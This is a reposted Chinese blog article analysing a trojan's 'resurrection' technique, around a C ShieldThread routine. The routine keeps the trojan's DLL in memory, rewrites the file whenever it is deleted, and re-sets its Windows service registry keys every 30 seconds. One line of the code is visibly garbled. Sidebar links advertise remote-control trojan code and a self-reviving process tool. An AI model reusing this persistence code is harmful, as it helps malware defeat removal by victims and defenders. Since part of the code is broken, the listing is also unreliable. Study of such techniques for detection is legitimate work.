【转】解析木马复活技术-程序被删还会还原 作者:未知

最新推荐文章于 2023-10-19 15:52:49 发布
最新推荐文章于 2023-10-19 15:52:49 发布
阅读量548 收藏
点赞数
分类专栏: 病毒&木马研究 文章标签: path winapi null file system


分析者:Popluna

转载请注明

我在无聊之中看到一款源码,下来看以后发现程序会创建一个ShieldThread线程

跟踪下去发现它会把自身读取到一个分配的内存空间,然后每个一段时间判断自身文件是否存在

如果不存在就从内存中写出文件。具体代码如下

//

DWORD WINAPI ShieldThread(LPVOID lpParamter)
{
 char   DllFilePath[MAX_PATH];
 HANDLE hDllFile;
 HANDLE hSearch;
 void*  MemDll;
 int    SizeDll;
    DWORD  BytesRead;
 WIN32_FIND_DATA  FileData;
    char   ProtectKey1[MAX_PATH*2],ProtectKey2[MAX_PATH*2];
    char * SubRoot="SYSTEM\\CurrentControlSet\\Services\\";
    
 __try
 { 
  ShieldFlag = 1;
  strncpy(ProtectKey1,SubRoot,sizeof(ProtectKey1));
     strncat(ProtectKey1,ServerCFG.ServiceName,sizeof(ProtectKey1)); 
     strncpy(ProtectKey2,ProtectKey1,sizeof(ProtectKey2));
     strncat(ProtectKey2,"));
     GetModuleFileName(HMODULE(hDll), DllFilePath,MAX_PATH);

     hDllFile =CreateFile(DllFilePath,GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
     SizeDll  =GetFileSize(hDllFile,0);
     MemDll   =VirtualAlloc(0,SizeDll,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
        ReadFile(hDllFile,MemDll,SizeDll,&BytesRead,0);
     CloseHandle(hDllFile);
    
     while(1)
  {
     
   hSearch =FindFirstFile(DllFilePath,&FileData);
         if(hSearch==INVALID_HANDLE_VALUE)
   {          
    hDllFile=CreateFile(DllFilePath,GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
                WriteFile(hDllFile,MemDll,SizeDll,&BytesRead,0);
          CloseHandle(hDllFile);
   } 
   FindClose(hSearch);
         WriteRegEx(HKEY_LOCAL_MACHINE,ProtectKey1,"Start",REG_DWORD,NULL,2,1);
      WriteRegEx(HKEY_LOCAL_MACHINE,ProtectKey2,"ServiceDll",REG_EXPAND_SZ,DllFilePath,NULL,0);
      Sleep(30000);
  }
 }
 __finally
 {
  CloseHandle(hDllFile);
  FindClose(hSearch);
 }
 return 0;
}

 

The_IT_Crowd
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
微信小程序--旋木马/缩放轮播图效果
03-29
文章涉及技术点 微信小程序原生Swiper控件 Wxss Transform、Transition 轮播条滚动回调控制 微信小程序条件渲染、列表渲染 全部实现代码加起来也就三四十行,大部分还用来写wxml UI代码,所以功能实现起来非常简单。...
Node.js 安装教程(Windows)
热门推荐
pcdd 的博客
02-22 1万+
什么是Node.js? 简单的说 Node.js 就是运行在服务端的 JavaScript。 Node.js是一个基于 Chrome V8 引擎的 JavaScript 运行环境; Node.js使用一个事件驱动、非阻塞式 I/O 的模型,使其轻量且高效; Node.js的软件包生态系统npm是全球最大的开源库生态系统。 1. 下载安装包 Node.js 官方网站下载:https://nodejs.org/zh-cn/download/ 2. 安装 一路点击next即可,注意修改安装路径 安装默认会添加到
Nodejs基于Windows安装教程
weixin_42064877的博客
07-08 1万+
Nodejs基于Windows安装教程
Windows安装node.js教程
weixin_42881581的博客
06-12 4756
系统变量中新建NODE_PATH,D:\Program Files\Java\nodejs\node_global\node_modules。用户变量path里面删除原有的npm路径,新建D:\Program Files\Java\nodejs\node_global。在终端进入文件目录,执行“node testnode.test";右键“开始”,选择“终端管理员”,打开终端,即可正常使用。操作完成后,即可不以管理员角色正常使用。指令时,报权限错误,无法。
Windows 环境下安装与配置 Node.js
yilvyangguangAA的博客
05-21 3531
以上node.js的安装
Windows 上安装 Node.js
github_74974415的博客
02-28 1587
步骤 6 :点击 Install(安装) 开始安装Node.js。你也可以点击 Back(返回)来修改先前的配置。步骤 5 : 点击树形图标来选择你需要的安装模式 , 然后点击下一步 next(下一步)点击 Finish(完成)按钮退出安装向导。步骤 1 : 双击下载后的安装包。你可以采用以下两种方式来安装。
计算机网络-06 查看木马程序建立的会话.mp3
06-30
计算机网络-06 查看木马程序建立的会话.mp3
浏览器被劫持木马查杀hrkill-1.0.0.50.exe
04-17
浏览器被劫持木马查杀hrkill-1.0.0.50
网络安全技术- TCPIP-11 IPSec控制木马产生的流量.mp3
07-04
网络安全技术- TCPIP-11 IPSec控制木马产生的流量.mp3
计算机病毒解析与防范技术研究-kaic.docx
02-16
2.1.2木马病毒 2.1.3脚本病毒 2.2基于网络的病毒传播模式 2.2.1通过电子邮件进行传播 2.2.2通过扫描系统漏洞传播 2.2.3通过无线电的方式传播 2.3几个经典的计算机病毒传播模型 2.3.1 SIS模型 2.3.2 SIR模型 2.4案例...
自我复制隐藏删除双进程复活
02-14
易语言代码 自我复制隐藏删除双进程复活
Windows系统安装Node.Js及环境配置
qq_30386941的博客
08-13 5417
因为npm历史原因,包下载速度非常慢,甚至因为下载太慢而出错,为了提升包下载速度,用yarn或cnpm代替npm包管理。yarn由facebook提供,下载速度非常快,是nodejs官方推荐的包管理器,且包管理下载速度都优于npm,而cnpm虽然下载速度也快,但是使用cnpm安装包会比其他管理器安装的包体积更大,这是由于文件结构不同的原因,因此推荐使用yarn替代npm。包主要是用npm包管理器进行安装,由于国内下载安装包较慢,这时候就需要修改服务器地址为国内镜像地址。,以便后面调整包管理路径。...
【 Windows 】node.js 安装
hapyeveryday的博客
07-14 2221
【 Windows 】node.js 安装
2023年全网最新 Windows10 搭建 Node.js 环境教程
最新发布
Amo Xiang的博客
10-19 4306
windows10安装node.js详解
Windows 下 Node.js 的安装图文教程
村雨遥
04-08 5207
本教程所有操作基于Window 10操作系统 +,原则上适用于所有Windows操作系统,细节不同请根据自己需要自行判断。通过上述操作,我们就可以成功安装Node.js,接下来我们就可以使用npm等工具了,是不是很简单呢!
Node.js安装及环境配置之Windows篇
m0_72751276的博客
12-03 4974
Node.js安装及环境配置之Windows篇
windows上安装nodejs
lalala_dxf的博客
04-02 407
windows上安装nodejs步骤
安装及使用Node.js步骤(win11)
m0_50089886的博客
01-23 1万+
node.js是一个JavaScript的项目管理工具,功能类似于java中的maven或者python中的pip。NPM(node package manager)是 node.js 的包管理和分发工具。新版的node.js集成了npm,安装node.js后无需额外安装npm。
dll注入系列——内存加载
40KO的博客
04-11 5584
0x0废话 dll注入的方式和程序正常加载dll模块的本质上是相同的,无非是通过导入表加载,利用LoadLibrary加载和一些系统机制强制加载。要使程序动态加载一个dll文件,也就是执行程序原本没有的代码,势必要改变程序的控制流,创建一个新的线程可以做到这件事。最简单的远线程注入就是利用CreateRemoteThread和LoadLibrary两个API来完成了。 关于注入的介绍及两种经...
网络编程木马程序设计
10-12
网络编程中的木马程序是一种恶意软件,用于在目标计算机上执行未经授权的操作。下面是一个简单的网络编程木马程序示例,用于远程控制目标计算机: ```python import socket # 攻击者IP和端口 attacker_ip = '192....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值